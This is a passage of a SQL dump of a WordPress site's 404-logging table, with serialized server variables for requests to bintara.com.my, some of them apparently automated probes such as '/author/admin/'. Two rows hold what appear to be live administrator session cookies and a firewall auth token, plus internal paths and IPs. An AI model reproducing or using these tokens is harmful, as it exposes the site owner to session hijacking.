03:47:50',35133104,36935432,'https://bintara.com.my/?page_id=18',1,0,'196.16.255.101'),(27392,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLWoIrQkxzalYOH97jVkwAAAUk\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:11:\"13.66.139.0\";s:11:\"REMOTE_PORT\";s:5:\"35200\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLWoIrQkxzalYOH97jVkwAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569904288.7918\";s:12:\"REQUEST_TIME\";s:10:\"1569904288\";}}','notice','2019-10-01 04:31:31','2019-10-01 04:31:29',35152472,36955816,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'13.66.139.0'),(27390,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"196.16.255.101\";s:11:\"REMOTE_PORT\";s:5:\"34299\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLMYjU8kVzmT4VXgrHxFAAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569901666.2803\";s:12:\"REQUEST_TIME\";s:10:\"1569901666\";}}','notice','2019-10-01 03:47:48','2019-10-01 03:47:46',35133104,36935432,'https://bintara.com.my/?page_id=18',1,0,'196.16.255.101'),(27389,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"196.16.255.101\";s:11:\"REMOTE_PORT\";s:5:\"56071\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLMXYrQkxzalYOH97jOvQAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569901661.6935\";s:12:\"REQUEST_TIME\";s:10:\"1569901661\";}}','notice','2019-10-01 03:47:44','2019-10-01 03:47:42',35133104,36935432,'https://bintara.com.my/?page_id=18',1,0,'196.16.255.101'),(27388,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"196.16.255.101\";s:11:\"REMOTE_PORT\";s:5:\"49438\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLMWDU8kVzmT4VXgrHxEwAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569901656.7227\";s:12:\"REQUEST_TIME\";s:10:\"1569901656\";}}','notice','2019-10-01 03:47:39','2019-10-01 03:47:37',35133104,36935432,'https://bintara.com.my/?page_id=18',1,0,'196.16.255.101'),(27387,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"277-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"FAE69B8B-E7BC-4942-91B3-132850177658\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"277-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLKhjU8kVzmT4VXgrHw4QAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"50306\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLKhjU8kVzmT4VXgrHw4QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569901191.0639\";s:12:\"REQUEST_TIME\";s:10:\"1569901191\";}}','notice','2019-10-01 03:39:53','2019-10-01 03:39:51',35507328,37310952,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27386,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLIG5HiT4fRdgjqkdPBWAAAAMI\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:15:\"181.211.115.174\";s:11:\"REMOTE_PORT\";s:5:\"45273\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLIG5HiT4fRdgjqkdPBWAAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569900571.8963\";s:12:\"REQUEST_TIME\";s:10:\"1569900571\";}}','notice','2019-10-01 03:29:34','2019-10-01 03:29:32',35182696,36988632,'https://bintara.com.my/author/admin/',1,0,'181.211.115.174'),(27385,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/%3C/div\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:2:\"59\";s:13:\"H2_STREAM_TAG\";s:5:\"84-59\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:39:\"image/webp,image/apng,image/*,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:619:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C784a989cce6fc638f30c138b2cb60f4abcf705119f9b4a888822333d868b7eb4; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C0e0191a2b294e19bb063e4cda4c45917d24fcb231acbe3e6dc43b6dee4653036; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569899457\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=3606&action=elementor&ip-geo-block-auth-nonce=6d30d4b00c\";s:19:\"HTTP_SEC_FETCH_MODE\";s:7:\"no-cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:2:\"59\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"84-59\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/</div\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLECYbUhCibXajp1P5yvwAAADs\";s:12:\"REDIRECT_URL\";s:6:\"/</div\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"65280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:10:\"SCRIPT_URL\";s:6:\"/</div\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLECYbUhCibXajp1P5yvwAAADs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569899529.8981\";s:12:\"REQUEST_TIME\";s:10:\"1569899529\";}}','notice','2019-10-01 03:12:13','2019-10-01 03:12:10',36002232,36258184,'https://bintara.com.my/%3C/div',1,1,'115.132.144.171'),(27384,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/%3C/div\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:2:\"57\";s:13:\"H2_STREAM_TAG\";s:5:\"84-57\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:39:\"image/webp,image/apng,image/*,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:619:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C784a989cce6fc638f30c138b2cb60f4abcf705119f9b4a888822333d868b7eb4; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C0e0191a2b294e19bb063e4cda4c45917d24fcb231acbe3e6dc43b6dee4653036; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569899457\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=3606&action=elementor&ip-geo-block-auth-nonce=6d30d4b00c\";s:19:\"HTTP_SEC_FETCH_MODE\";s:7:\"no-cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:2:\"57\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"84-57\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/</div\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLEBobUhCibXajp1P5yvgAAADk\";s:12:\"REDIRECT_URL\";s:6:\"/</div\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"65280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:10:\"SCRIPT_URL\";s:6:\"/</div\";s:11:\"SERVER_AD